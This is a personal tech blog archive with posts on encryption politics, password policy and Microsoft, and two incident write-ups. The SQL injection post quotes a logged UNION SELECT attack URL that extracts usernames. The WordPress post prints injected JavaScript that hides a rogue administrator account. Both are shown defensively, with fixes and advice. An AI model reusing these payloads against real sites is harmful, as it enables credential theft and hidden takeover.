Encryption

Looks like the government is at it again now that Apple has come out stating that they are not going to roll over and provide a master key to their iPhone software. Really NSA? How about the part where the terrorist didn’t use encryption in these attacks.

European media outlets are reporting that the location of a raid conducted on a suspected safe house Wednesday morning was extracted from a cellphone, apparently belonging to one of the attackers, found in the trash outside the Bataclan concert hall massacre. Le Monde reported that investigators were able to access the data on the phone, including a detailed map of the concert hall and an SMS messaging saying “we’re off; we’re starting.” Police were also able to trace the phone’s movements.

Why this matters

I know that there are a lot of people out there that think our government can do no wrong and national security is the most important thing that they can do. But there is a lawful way in which to handle this. The 4th amendment to the constitution should protect us from the massive surveillance systems that the government has put in place since 9/11. Yes, it was horrible what happened on that day and I’m still as pissed about it now as I was then. But I’m more upset at the eroding of our rights as politicians and government officials put in more programs to watch our electronic communications en mass.

Several companies have either released statements or made comments on the current state of encryption and working with the government in these matters. My company has stated this:

We condemn terrorism and have total solidarity with victims of terror. Those who seek to praise, promote, or plan terrorist acts have no place on our services. We also appreciate the difficult and essential work of law enforcement to keep people safe. When we receive lawful requests from these authorities we comply. However, we will continue to fight aggressively against requirements for companies to weaken the security of their systems. These demands would create a chilling precedent and obstruct companies’ efforts to secure their products

Tim Cook and Apple have their letter which ends with:

Opposing this order is not something we take lightly. We feel we must speak up in the face of what we see as an overreach by the U.S. government.

We are challenging the FBI’s demands with the deepest respect for American democracy and a love of our country. We believe it would be in the best interest of everyone to step back and consider the implications.

While we believe the FBI’s intentions are good, it would be wrong for the government to force us to build a backdoor into our products. And ultimately, we fear that this demand would undermine the very freedoms and liberty our government is meant to protect.

So encrypt your backups, use https when ever possible. Set really difficult passwords and use a password manager like LastPass so you don’t forget them. Remember folks, just because you have nothing to hide, doesn’t mean you shouldn’t care about this subject. One person in particular that has brought more to light on the intrusions into our lives put it best:

If you think privacy is unimportant for you because you have nothing to hide, you might as well say free speech is unimportant for you because you have nothing useful to say.

–Edward Snowden

SQL exploits

You know its going to be a bad day when you get the following email:

Did someone hack our website? It looks like a Chinese news listing entry has been added with today’s date.

Ballsack!

Time to roll up the sleeves. How bad is the damage?

From the looks of it, other sites on the web server had not been damaged. Doing a search for modified files found nothing out of the ordinary had been changed. Log files sure but nothing out of the ordinary. A search through the web logs of the site showed that this appeared to be an attack on the Content Management System (CMS) for the site.

Whichever jackass wrote that code should be beaten! Get the torches and pitchforks, death to the programmer!! Oh wait, that was me. Death to the evil script kiddie that attacked my beautiful code!!!!!!!!!

Searching through the logs, I started seeing some interesting logs. A bunch of them that had variations such as this:

http://unigleeclub.com/news.phtml?id=-999.9%20UNION%20ALL%20SELECT%200x31303235343830303536,(SELECT%20concat(0x7e,0x27,Hex(cast(user.username%20as%20char)),0x27,0x7e)%20FROM%20`gleeclub`.user%20LIMIT%203,1)%20,0x31303235343830303536,0x31303235343830303536--

This one is actually after a lot of hits from the attacker of figuring out the tables and then getting down to the nitty gritty of pulling out a username and password.

The issue was that I had forgotten to sanitize my data. Like a jackass, I didn’t check that $id was an actual integer variable and when they ran thier script they were able to pull out a hex string that, with the use of such tools as this site, you can easily translate this into text.

The Quick Fix

I put in 2 fixes to ensure that we were dealing with an integer value here. First, I did some simple math to the variable that changes its type if it is not an integer.

$id = $id+0;

If you have a string, you’ll get back a zero. If you have an integer value, you’re good to go.

Also in the code, I expanded the if statement that was around the code to grab the specific news item. Instead of just checking to see if the $id variable was set, I now check to see if it is set and greater than zero, another layer in ensuring that we have a number instead of a string of text.

//Before:
if(isset($id) && $id != "")

//After:
if(isset($id) && $id != "" && $id > 0)

We’re all human and humans make mistakes. This code that was exploited was written 8 years ago at a time when I should have known better, but missed it. It lived in the wild up until last year when it was finally exploited. I’m lucky that it took that long for it to expose itself, but kind of embarrassed that it was there in the first place. While I tend to come down hard on people for not doing these sort of things, its only because I’ve learned my lesson the hard way and have seen people continually mess this stuff up. While this happened to me a while ago, I’ve had friends get bit by this very recently so I figured it was time to finish off this post and get it out the door. An ounce of prevention sort of thing.

To lear more about SQL Inject attacks, here is a good article by Bhanu Mahesh on Quality Software Connection on how to prevent them.

 

20%

We launched our Hosted Exchange 2007 Product just over a year ago. And for the most part, things have gone great.

One of our early decisions was to balance the security of the system while making the system as user friendly as possible. Originally, we had a pretty strict password policy. We soon found that many of our customers were not too happy with this policy and thought it was too much. Were we out of control security freaks? Shouldn’t the customer appreciate the steps that we are taking to not only secure our servers, but their information!

Looking around at other vendors, we quickly found that we may be a bit too harsh. Take Gmail for example. Sure its not exchange. But then again it has over 100 million users. If they had massive issues with security and hacking, they clearly have it under control behind the scenes so things do not get out of hand.

And have you ever been prompted to change your password on gmail? I haven’t.

So we compromised. We altered the time between when the system forces you to change your password. We altered the number of passwords that you could recycle. And we also added a somewhat buried feature in our customer portal. That feature, ‘allow passwords to never expire’

Holy crap! Let’s just blow a huge freaking hole in the security system shall we.

This was a feature that we were not all that happy about, but with the other measures in place we figured we would avoid passwords such as abc123. It makes the end user happy, we have some level of security though not as high and tight as we would like. But its better than having things wide open.

Now here is the shocking part of this. 20% of our users have this feature enabled. 20-feaking-percent! I was really hoping for this number to be in the 5-10% range.
But no, 1 in 5 of our users will never change their password again.

Or will they?

I’m currently developing a nag script that will send out a reminder to the end users ever couple of months. Not enough to completely annoy the heck out of them. But hopefully enough to get a good portion of that 20% to change their passwords on a semi-regular basis.

So what do you do for your password policy? Leave your tips and tricks in the comments section. We’d like to hear what you think is an acceptable policy to stay secure!

WordPress Security Concern

I’m not sure if you’ve applied the latest updates for wordpress but I did last week. However, it appears that someone got in to one of the blogs that I manage and created an account for themselves. They didn’t do anything with it, but they DID have full admin access. I’m assuming that this was due to a security bug in 2.8.3 as they were in when that was on the server.

So patch your servers if you haven’t already!

Here’s how I noticed that the person had gotten in. I was doing an audit on the users on the site and noticed that the count next to Administrators stated that there were 3 Admins for the site. However, when I viewed the list, there were only 2 on the page. Taking a look in the database, I noticed a user with a goofy name for an admin. And peaking in the wp_usermeta table, I noticed the following attribute was assigned to their firstname:

         for (var i = 0; i < tags.length; i++) {
                        var t=tags[i].innerHTML;
                        var h=tags[i];
                        if(t.indexOf(s)>0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                        }
                }
                var arr=document.getElementsByTagName("ul");
                for(var i in arr) if(arr[i].className=="subsubsub"){
                        var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
                        if(n[1]>0){
                                var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);

Its not formatted the greatest, but basically, it hides the username from the list. Nice eh! Simply deleting this entry made the user show up in the user list where I was able to do some auditing before blowing away the user.

So audit your admin list and patch your servers! This could have been a lot worse if they had starting defacing the site or hiding other gems on there.

-Matt

Business as usual

Over the past couple of years, I have been able to tolerate Microsoft a bit more than I used to. When your primary income relies on people purchasing Exchange and OCS accounts that you provide the back end provisioning and automation for, you quickly realize where your bread is buttered.

But this sort of crap really needs to stop. Yes, its their operating system. But that doesn’t excuse installing add-ons to 3rd party applications and disabling the uninstall options. I’m with the writer of this article, this is a great way to get your customers to not trust you and precisely the reason I haven’t had windows on my desktop for 8 years.

A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla’s Firefox Web browser.

Earlier this year, Microsoft shipped a bundle of updates known as a “service pack” for a programming platform called the Microsoft .NET Framework, which Microsoft and plenty of third-party developers use to run a variety of interactive programs on Windows.

The service pack for the .NET Framework, like other updates, was pushed out to users through the Windows Update Web site. A number of readers had never heard of this platform before Windows Update started offering the service pack for it, and many of you wanted to know whether it was okay to go ahead and install this thing. Having earlier checked to see whether the service pack had caused any widespread problems or interfered with third-party programs — and not finding any that warranted waving readers away from this update — I told readers not to worry and to go ahead and install it.

source